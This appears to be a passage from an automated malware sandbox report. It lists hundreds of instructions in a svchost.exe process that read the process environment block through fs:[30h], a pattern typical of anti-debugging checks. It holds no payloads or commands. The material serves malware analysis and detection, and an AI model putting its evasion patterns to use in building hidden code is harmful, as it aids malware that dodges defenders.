                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]2_2_033383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]2_2_033383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]2_2_033383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]2_2_033383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B63C0 mov eax, dword ptr fs:[00000030h]2_2_033B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332823B mov eax, dword ptr fs:[00000030h]2_2_0332823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334260 mov eax, dword ptr fs:[00000030h]2_2_03334260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334260 mov eax, dword ptr fs:[00000030h]2_2_03334260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334260 mov eax, dword ptr fs:[00000030h]2_2_03334260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332826B mov eax, dword ptr fs:[00000030h]2_2_0332826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A250 mov eax, dword ptr fs:[00000030h]2_2_0332A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336259 mov eax, dword ptr fs:[00000030h]2_2_03336259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EA250 mov eax, dword ptr fs:[00000030h]2_2_033EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EA250 mov eax, dword ptr fs:[00000030h]2_2_033EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B8243 mov eax, dword ptr fs:[00000030h]2_2_033B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B8243 mov ecx, dword ptr fs:[00000030h]2_2_033B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033402A0 mov eax, dword ptr fs:[00000030h]2_2_033402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033402A0 mov eax, dword ptr fs:[00000030h]2_2_033402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]2_2_033C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov ecx, dword ptr fs:[00000030h]2_2_033C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]2_2_033C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]2_2_033C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]2_2_033C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]2_2_033C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E284 mov eax, dword ptr fs:[00000030h]2_2_0336E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E284 mov eax, dword ptr fs:[00000030h]2_2_0336E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h]2_2_033B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h]2_2_033B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h]2_2_033B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h]2_2_033402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h]2_2_033402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h]2_2_033402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03360124 mov eax, dword ptr fs:[00000030h]2_2_03360124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA118 mov ecx, dword ptr fs:[00000030h]2_2_033DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h]2_2_033DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h]2_2_033DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h]2_2_033DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F0115 mov eax, dword ptr fs:[00000030h]2_2_033F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]2_2_033DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]2_2_033DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]2_2_033DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]2_2_033DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C156 mov eax, dword ptr fs:[00000030h]2_2_0332C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C8158 mov eax, dword ptr fs:[00000030h]2_2_033C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336154 mov eax, dword ptr fs:[00000030h]2_2_03336154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336154 mov eax, dword ptr fs:[00000030h]2_2_03336154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]2_2_033C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]2_2_033C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov ecx, dword ptr fs:[00000030h]2_2_033C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]2_2_033C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]2_2_033C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]2_2_033B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]2_2_033B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]2_2_033B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]2_2_033B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]2_2_0332A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]2_2_0332A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]2_2_0332A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034061E5 mov eax, dword ptr fs:[00000030h]2_2_034061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03370185 mov eax, dword ptr fs:[00000030h]2_2_03370185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EC188 mov eax, dword ptr fs:[00000030h]2_2_033EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EC188 mov eax, dword ptr fs:[00000030h]2_2_033EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D4180 mov eax, dword ptr fs:[00000030h]2_2_033D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D4180 mov eax, dword ptr fs:[00000030h]2_2_033D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033601F8 mov eax, dword ptr fs:[00000030h]2_2_033601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_033AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F61C3 mov eax, dword ptr fs:[00000030h]2_2_033F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F61C3 mov eax, dword ptr fs:[00000030h]2_2_033F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C6030 mov eax, dword ptr fs:[00000030h]2_2_033C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A020 mov eax, dword ptr fs:[00000030h]2_2_0332A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C020 mov eax, dword ptr fs:[00000030h]2_2_0332C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B4000 mov ecx, dword ptr fs:[00000030h]2_2_033B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335C073 mov eax, dword ptr fs:[00000030h]2_2_0335C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03332050 mov eax, dword ptr fs:[00000030h]2_2_03332050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6050 mov eax, dword ptr fs:[00000030h]2_2_033B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F60B8 mov eax, dword ptr fs:[00000030h]2_2_033F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F60B8 mov ecx, dword ptr fs:[00000030h]2_2_033F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C80A8 mov eax, dword ptr fs:[00000030h]2_2_033C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333208A mov eax, dword ptr fs:[00000030h]2_2_0333208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C0F0 mov eax, dword ptr fs:[00000030h]2_2_0332C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033720F0 mov ecx, dword ptr fs:[00000030h]2_2_033720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0332A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033380E9 mov eax, dword ptr fs:[00000030h]2_2_033380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B60E0 mov eax, dword ptr fs:[00000030h]2_2_033B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B20DE mov eax, dword ptr fs:[00000030h]2_2_033B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336273C mov eax, dword ptr fs:[00000030h]2_2_0336273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336273C mov ecx, dword ptr fs:[00000030h]2_2_0336273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336273C mov eax, dword ptr fs:[00000030h]2_2_0336273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AC730 mov eax, dword ptr fs:[00000030h]2_2_033AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C720 mov eax, dword ptr fs:[00000030h]2_2_0336C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C720 mov eax, dword ptr fs:[00000030h]2_2_0336C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330710 mov eax, dword ptr fs:[00000030h]2_2_03330710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03360710 mov eax, dword ptr fs:[00000030h]2_2_03360710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C700 mov eax, dword ptr fs:[00000030h]2_2_0336C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338770 mov eax, dword ptr fs:[00000030h]2_2_03338770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330750 mov eax, dword ptr fs:[00000030h]2_2_03330750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BE75D mov eax, dword ptr fs:[00000030h]2_2_033BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372750 mov eax, dword ptr fs:[00000030h]2_2_03372750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372750 mov eax, dword ptr fs:[00000030h]2_2_03372750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B4755 mov eax, dword ptr fs:[00000030h]2_2_033B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336674D mov esi, dword ptr fs:[00000030h]2_2_0336674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336674D mov eax, dword ptr fs:[00000030h]2_2_0336674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336674D mov eax, dword ptr fs:[00000030h]2_2_0336674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033307AF mov eax, dword ptr fs:[00000030h]2_2_033307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E47A0 mov eax, dword ptr fs:[00000030h]2_2_033E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D678E mov eax, dword ptr fs:[00000030h]2_2_033D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033347FB mov eax, dword ptr fs:[00000030h]2_2_033347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033347FB mov eax, dword ptr fs:[00000030h]2_2_033347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]2_2_033527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]2_2_033527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]2_2_033527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BE7E1 mov eax, dword ptr fs:[00000030h]2_2_033BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333C7C0 mov eax, dword ptr fs:[00000030h]2_2_0333C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B07C3 mov eax, dword ptr fs:[00000030h]2_2_033B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E627 mov eax, dword ptr fs:[00000030h]2_2_0334E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03366620 mov eax, dword ptr fs:[00000030h]2_2_03366620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368620 mov eax, dword ptr fs:[00000030h]2_2_03368620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333262C mov eax, dword ptr fs:[00000030h]2_2_0333262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372619 mov eax, dword ptr fs:[00000030h]2_2_03372619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE609 mov eax, dword ptr fs:[00000030h]2_2_033AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03362674 mov eax, dword ptr fs:[00000030h]2_2_03362674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F866E mov eax, dword ptr fs:[00000030h]2_2_033F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F866E mov eax, dword ptr fs:[00000030h]2_2_033F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A660 mov eax, dword ptr fs:[00000030h]2_2_0336A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A660 mov eax, dword ptr fs:[00000030h]2_2_0336A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334C640 mov eax, dword ptr fs:[00000030h]2_2_0334C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033666B0 mov eax, dword ptr fs:[00000030h]2_2_033666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C6A6 mov eax, dword ptr fs:[00000030h]2_2_0336C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334690 mov eax, dword ptr fs:[00000030h]2_2_03334690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334690 mov eax, dword ptr fs:[00000030h]2_2_03334690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B06F1 mov eax, dword ptr fs:[00000030h]2_2_033B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B06F1 mov eax, dword ptr fs:[00000030h]2_2_033B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0336A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A6C7 mov eax, dword ptr fs:[00000030h]2_2_0336A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C6500 mov eax, dword ptr fs:[00000030h]2_2_033C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336656A mov eax, dword ptr fs:[00000030h]2_2_0336656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336656A mov eax, dword ptr fs:[00000030h]2_2_0336656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336656A mov eax, dword ptr fs:[00000030h]2_2_0336656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338550 mov eax, dword ptr fs:[00000030h]2_2_03338550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338550 mov eax, dword ptr fs:[00000030h]2_2_03338550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033545B1 mov eax, dword ptr fs:[00000030h]2_2_033545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033545B1 mov eax, dword ptr fs:[00000030h]2_2_033545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B05A7 mov eax, dword ptr fs:[00000030h]2_2_033B05A7
